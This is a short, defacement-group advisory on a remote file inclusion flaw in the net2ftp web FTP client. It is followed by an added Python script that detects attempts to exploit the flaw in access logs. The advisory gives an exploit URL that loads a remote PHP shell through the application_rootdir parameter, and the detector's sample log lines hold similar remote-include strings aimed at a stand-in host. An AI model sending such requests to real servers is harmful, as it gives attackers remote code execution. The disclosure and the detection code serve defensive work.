+--------------------------------------------------------------------
+
- net2ftp: a web based FTP client :) <= Remote File Inclusion
+--------------------------------------------------------------------
+
+--------------------------------------------------------------------
+
- Code index.php:
- …
- require_once($application_rootdir . "/includes/authorizations.inc.php");
- require_once($application_rootdir . "/includes/bookmark.inc.php");
- require_once($application_rootdir . "/includes/browse.inc.php");
- require_once($application_rootdir . "/includes/database.inc.php");
- …
+--------------------------------------------------------------------
+
- $application_rootdir is not properly sanitized before it is used to
- build the require_once() paths shown above.
- The bug is in the "net2ftp" package for net2ftp.
+--------------------------------------------------------------------
+
- Solution:
- Add this line to your PHP file:
- $application_rootdir = "user/dir"; // Your root path
+--------------------------------------------------------------------
http://[target]/index.php?application_rootdir=http://phpshell
+
+--------------------------------------------------------------------
- [W]orld [D]efacers [T]eam
- Greets:
- || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
- || Pro Hacker ||
+-------------------------[ W D T ]----------------------------------
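
Added example (not part of the original advisory or of net2ftp): a log check that flags any request supplying application_rootdir, the variable the advisory names, since the application is meant to set that path itself. It assumes Apache/nginx "combined" access logs; the sample lines, addresses and example.invalid host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "application_rootdir"  # variable named in the advisory
# Stream wrappers that turn an include path into a remote or injected source.
REMOTE = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.I)
# Assumption: Apache/nginx "combined" access-log layout.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding so %2568ttp and http compare equal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def php_name(raw):
    """Normalise a query key as PHP does: '.' and ' ' become '_', '[..]' is an array suffix."""
    return fully_decode(raw).replace(".", "_").replace(" ", "_").split("[")[0]

def classify(line):
    """Return (client_ip, severity, decoded_value) for a hit, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if php_name(name) != PARAM:
            continue
        value = fully_decode(value)
        # Any client-supplied value is a finding; a wrapper scheme means a remote include attempt.
        return ip, ("remote-include" if REMOTE.match(value) else "override"), value
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

SAMPLE_LOG = [  # constructed lines using documentation address ranges
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?state=browse HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /index.php?application_rootdir=http://example.invalid/x.txt HTTP/1.1" 200 90 "-" "-"',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /index.php?application_rootdir=%2568ttp%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 90 "-" "-"',
    '203.0.113.4 - - [01/Jan/2007:10:01:00 +0000] "GET /index.php?application.rootdir=/tmp HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Hits marked "override" carry no wrapper scheme but still show a client trying to set the include root, so they are worth reviewing alongside the "remote-include" ones.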